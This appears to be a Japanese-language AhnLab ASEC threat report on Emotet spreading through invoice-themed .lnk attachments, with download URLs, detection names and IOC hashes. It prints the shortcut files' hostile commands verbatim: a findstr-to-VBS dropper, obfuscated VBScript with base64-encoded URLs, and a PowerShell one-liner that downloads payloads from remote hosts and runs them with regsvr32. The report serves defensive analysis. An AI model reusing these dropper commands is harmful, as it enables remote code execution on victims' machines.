ASEC 分析チームは最近、Emotet マルウェアがリンクファイル(.lnk)を通じて拡散していることを確認した。Emotet マルウェアは過去から何度も拡散が続いており、4月からは Emotet ダウンローダーが Excel ファイルだけではなく、リンクファイル(.lnk)も使用していることが確認された。
確保した EML ファイルは、すべてユーザーのメールに対する返信であるかのように装ってマルウェアを配布するという共通点が見られる。



[図1] メールに添付されている Excel ファイルの場合、以下のブログで共有したマクロシートを利用したタイプと同じ方式を使用している。


ダウンロード URL は以下の通りである。
- hxxp://easiercommunications[.]com/wp-content/w/
- hxxp://dulichdichvu[.]net/libraries/QhtrjCZymLp5EbqOdpKk/)
- hxxps://www.whow[.]fr/wp-includes/H54Fgj0tG/)
- hxxp://genccagdas[.]com.tr/assets/TTHOm833iNn3BxT/)
- hxxp://heaventechnologies[.]com.pk/apitest/xdeAU0rx26LT9I/)
- hxxp://goonboy[.]com/goonie/bSFz7Av/
Excel ファイルのほか lnk ファイルも多数が発見されており、大半が Invoice 関連のファイル名で拡散していることが確認されている。また、配布日付によって実行されるコマンドに違いがある。
確認日 | 拡散ファイル名 |
---|---|
04/26 | EXT Payment status.lnk |
04/26 | Past Due invoice.lnk |
04/28 | Electronic form.lnk |
04/28 | detalles_28042022.lnk |
04/29 | Address Changed.lnk |
04/29 | Change of Address.lnk |
05/02 | Payment with a new address.lnk |
05/03 | INF_15823367.lnk |
05/03 | MES_11845137690439733.lnk |
- Invoice # US-616121772.lnk
[図2]のメールに添付された Invoice # US-616121772.lnk ファイルの場合、開くと以下のコマンドが実行される。
cmd.exe /v:on /c findstr “glKmfOKnQLYKnNs.*” “Invoice # US-616121772.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs” |
lnk ファイル下段には glKmfOKnQLYKnNs 文字列を始めとするスクリプトコードが存在するが、lnk ファイルを開くとこのコードを %TEMP% フォルダーの YlScZcZKeP.vbs ファイルに保存および実行する。

YlScZcZKeP.vbs ファイルは、内部に base64 でエンコードされた URL が存在し、この URL にアクセスしてさらなるマルウェアをダウンロードおよび実行する。
glKmfOKnQLYKnNs=1::on error resume next:Set FSO = CreateObject(“Scripting.FileSystemObject”)::Function Base64Decode(ByVal vCode): With CreateObject(“Msxml2.DOMDocument.3.0”).CreateElement(“base64”): .dataType = “bin.base64”: .text = vCode: Base64Decode = Stream_BinaryToString(.nodeTypedValue): End With:End Function::Function Stream_BinaryToString(Binary): With CreateObject(“ADODB.Stream”): .Type = 1: .Open: .Write Binary: .Position = 0: .Type = 2: .CharSet = “utf-8”: Stream_BinaryToString = .ReadText: End With:End Function::Dim LmPxinnpsd(6):::LmPxinnpsd(0) = “aHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2Iv”::LmPxinnpsd(1) = “aHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIv”::LmPxinnpsd(2) = “aHR0cDovL2RlbW8zNC5ja2cuaGsvc2VydmljZS9oaE1acmZDN01ubTlKRC8=”::LmPxinnpsd(3) = “aHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2Lw==”::LmPxinnpsd(4) = “aHR0cDovL2NpcHJvLm14L3ByZW5zYS9zaVpQNjlyQkZtaWJEdnVUUDFMLw==”::LmPxinnpsd(5) = “aHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8=”:::Execute(“dIm xml,Ws”&chr(-7328+7372)&”Db,FiLePaTH,u”&chr(6281-6199)&”L:”&chr(872280/7269)&”ml = “”MSXml2.SeRVERXmlht”&chr(-4790+4874)&”p.3″&chr(7943-7897)&”0″”:Ws = “”wscRipT.SHEll””:D”&chr(3908-3810)&” = “”aDo”&chr(-4831+4931)&”b.”&chr(7496-7413)&”TReam””:seT ImSHdnYd”&chr(-9735+9821)&”R =”&chr(-6409+6441) <省略> |
ダウンロード URL は以下の通りである。
- hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
- hxxp://filmmogzivota[.]rs/SpryAssets/gDR/
- hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/
- hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/
- hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1L/
- hxxp://colegiounamuno[.]es/cgi-bin/E/
以降、ダウンロードしたファイルを %TEMP% フォルダーに KzcEXkekpr.Zvp というファイル名で保存したあと、‘%wInDiR% \sySTem32\regsVR32.Exe %tmp% \KZcEXkEkpR.ZVP’コマンドを通じて実行する。
- 20220429_57092_005.lnk
[図3]のメールに添付されている 20220429_57092_005.lnk ファイルの場合、前述の lnk ファイルとは異なり、PowerShell コマンドを使用してさらなるファイルをダウンロードする。lnk ファイルを開くと以下の PowerShell コマンドを通じて Base64 でエンコードされたデータをデコードし、% TEMP% フォルダーに xLhSBgzPSx.ps1 で保存する。
C:\Windows\system32\cmd.exe /v:on /c fHjk4fTLlkc5DZfyorHstui9FxCd6xw3JieZWhdwrpiX+F4gEcRJCp5i1KXfjUxLJXU8QzW5||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c “&{[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(‘JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDo<中略>’)) > “%tmp%\xLhSBgzPSx.ps1”; powershell -executionpolicy bypass -file “$env:TEMP\xLhSBgzPSx.ps1”; Remove-Item -Force “$env:TEMP\xLhSBgzPSx.ps1″}” |
$ProgressPreference="SilentlyContinue";$links=("hxxp://gccon.in/UploadedFiles/UYtJNrT2llxy1/","hxxp://gakudou.com/photo06/hEu/","hxxp://giasotti.com/js/Khc6mb0zx4KoWX/","hxxp://plresende.com/pcinfor/cq/","hxxp://thomasmanton.com/wp-includes/owZnpWmH4D8j/","hxxp://gla.ge/old/PuVaff/");foreach ($u in $links) {try {IWR $u -OutFile $env:TEMP/jnURxtRmiO.SKh;Regsvr32.exe $env:TEMP/jnURxtRmiO.SKh;break} catch { }}
ダウンロード URL は以下の通りである。
- hxxp://gccon[.]in/UploadedFiles/UYtJNrT2llxy1/
- hxxp://gakudou[.]com/photo06/hEu/
- hxxp://giasotti[.]com/js/Khc6mb0zx4KoWX/
- hxxp://plresende[.]com/pcinfor/cq/
- hxxp://thomasmanton[.]com/wp-includes/owZnpWmH4D8j/
- hxxp://gla[.]ge/old/PuVaff/
以降、ダウンロードしたファイルを %TEMP% フォルダーに jnURxtRmiO.SKh というファイル名で保存したあと、‘Regsvr32.exe $env:TEMP/jnURxtRmiO.SKh’コマンドを通じて実行する。
前述したダウンロード URL からは Emotet マルウェアがダウンロードされることが確認されている。Emotet マルウェアは、実行すると内部に存在する複数の C&C サーバアドレスに接続を試み、接続に成功すると攻撃者によるコマンドを受け取ってさらなるマルウェアダウンロード等の不正な振る舞いを実行することができる。
最近、emotet マルウェアが Excel ドキュメントだけでなく、様々なダウンローダーを通じて配布されているため、ユーザーの注意が必要である。
現在 AhnLab V3 製品は、当該ファイルに対して以下の通り検知している。
[ファイル検知]
Downloader/XLS.Emotet
LNK/Autorun.Gen
Trojan/LNK.Runner
Trojan/Win.Agent.R488899
[IOC]
c32c22fa90ad51747e9939f8e7abf4c0
fd37d5fecf99b16df331be14649ac09c
6e1da3039639bb9d40fc9d5d355062c2
c43d185691aaba7d1d196156a4a450f7
hxxp://easiercommunications[.]com/wp-content/w/
hxxp://dulichdichvu[.]net/libraries/QhtrjCZymLp5EbqOdpKk/)
hxxps://www.whow[.]fr/wp-includes/H54Fgj0tG/)
hxxp://genccagdas[.]com.tr/assets/TTHOm833iNn3BxT/)
hxxp://heaventechnologies[.]com.pk/apitest/xdeAU0rx26LT9I/)
hxxp://goonboy[.]com/goonie/bSFz7Av/
hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
hxxp://filmmogzivota[.]rs/SpryAssets/gDR/
hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/
hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/
hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1L/
hxxp://colegiounamuno[.]es/cgi-bin/E/
hxxp://gccon[.]in/UploadedFiles/UYtJNrT2llxy1/
hxxp://gakudou[.]com/photo06/hEu/
hxxp://giasotti[.]com/js/Khc6mb0zx4KoWX/
hxxp://plresende[.]com/pcinfor/cq/
hxxp://thomasmanton[.]com/wp-includes/owZnpWmH4D8j/
hxxp://gla[.]ge/old/PuVaff/
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報